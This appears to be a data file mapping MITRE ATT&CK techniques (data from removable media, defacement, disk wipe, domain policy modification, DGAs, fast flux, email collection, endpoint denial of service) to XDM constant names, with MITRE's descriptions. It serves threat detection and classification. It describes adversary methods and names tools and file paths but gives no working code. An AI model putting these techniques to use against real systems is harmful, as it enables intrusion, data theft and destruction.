T1025 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_REMOVABLE_MEDIA Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media. https://attack.mitre.org/techniques/T1025
T1491 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. https://attack.mitre.org/techniques/T1491
T1491.002 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT_EXTERNAL_DEFACEMENT An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) https://attack.mitre.org/techniques/T1491/002
T1491.001 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT_INTERNAL_DEFACEMENT An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) https://attack.mitre.org/techniques/T1491/001
T1610 XDM_CONST.MITRE_TECHNIQUE_DEPLOY_CONTAINER Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) https://attack.mitre.org/techniques/T1610
T1587 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability. https://attack.mitre.org/techniques/T1587
T1587.002 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_CODE_SIGNING_CERTIFICATES Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations. https://attack.mitre.org/techniques/T1587/002
T1587.003 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_DIGITAL_CERTIFICATES Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control. https://attack.mitre.org/techniques/T1587/003
T1587.004 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_EXPLOITS Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). https://attack.mitre.org/techniques/T1587/004
T1587.001 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_MALWARE Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2 may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) https://attack.mitre.org/techniques/T1587/001
T1006 XDM_CONST.MITRE_TECHNIQUE_DIRECT_VOLUME_ACCESS Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009) Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy) https://attack.mitre.org/techniques/T1006
T1561 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) https://attack.mitre.org/techniques/T1561
T1561.001 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE_DISK_CONTENT_WIPE Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) https://attack.mitre.org/techniques/T1561/001
T1561.002 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE_DISK_STRUCTURE_WIPE Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system, targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped. To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) https://attack.mitre.org/techniques/T1561/002
T1484 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary-controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. https://attack.mitre.org/techniques/T1484
T1484.002 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION_DOMAIN_TRUST_MODIFICATION Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. https://attack.mitre.org/techniques/T1484/002
T1484.001 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION_GROUP_POLICY_MODIFICATION Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying `<GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml`.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in `<GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf`, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right) https://attack.mitre.org/techniques/T1484/001
T1482 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_TRUST_DISCOVERY Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) https://attack.mitre.org/techniques/T1482
T1189 XDM_CONST.MITRE_TECHNIQUE_DRIVE_BY_COMPROMISE Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
  * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
  * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) https://attack.mitre.org/techniques/T1189
T1568 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server, malware may employ dynamic resolution as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) https://attack.mitre.org/techniques/T1568
T1568.003 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_DNS_CALCULATION Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. An IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda) One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage) https://attack.mitre.org/techniques/T1568/003
T1568.002 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_DOMAIN_GENERATION_ALGORITHMS Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server, malware may employ a DGA as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) https://attack.mitre.org/techniques/T1568/002
T1568.001 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_FAST_FLUX_DNS Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity) The simplest method, "single-flux", involves registering and de-registering addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity) In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux, additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel. https://attack.mitre.org/techniques/T1568/001
T1114 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. https://attack.mitre.org/techniques/T1114
T1114.003 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_EMAIL_FORWARDING_RULE Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules) Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules) https://attack.mitre.org/techniques/T1114/003
T1114.001 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_LOCAL_EMAIL_COLLECTION Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\ \Documents\Outlook Files` or `C:\Users\ \AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files) https://attack.mitre.org/techniques/T1114/001
T1114.002 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_REMOTE_EMAIL_COLLECTION Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords. https://attack.mitre.org/techniques/T1114/002
T1573 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. https://attack.mitre.org/techniques/T1573
T1573.002 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL_ASYMMETRIC_CRYPTOGRAPHY Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). https://attack.mitre.org/techniques/T1573/002
T1573.001 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL_SYMMETRIC_CRYPTOGRAPHY Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. https://attack.mitre.org/techniques/T1573/001
T1499 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in
some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US
banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may
be points in the global network (such as high traffic gateway routers) where packets can be altered and
cause legitimate clients to execute code that directs network packets toward a target in high volume. This
type of capability was previously used for the purposes of web censorship where client HTTP traffic was
modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web
servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing
network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1499
T1499.003 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_APPLICATION_EXHAUSTION_FLOOD Adversaries may target resource intensive features of web applications to cause a denial of service (DoS).
Specific features in web applications may be highly resource intensive. Repeated requests to those
features may be able to exhaust system resources and deny access to the application or the server itself.
(Citation: Arbor AnnualDoSreport Jan 2018) https://attack.mitre.org/techniques/T1499/003
T1499.004 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_APPLICATION_OR_SYSTEM_EXPLOITATION Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny
availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical
applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS
condition. https://attack.mitre.org/techniques/T1499/004
T1499.001 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_OS_EXHAUSTION_FLOOD Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for
managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a
system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from
being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including
TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan
2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is
never completed. Because each OS has a maximum number of concurrent TCP connections that it will
allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus
preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods
leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces
the OS to search its state table for a related TCP connection that has already been established. Because
the ACK packets are for connections that do not exist, the OS will have to search the entire state table to
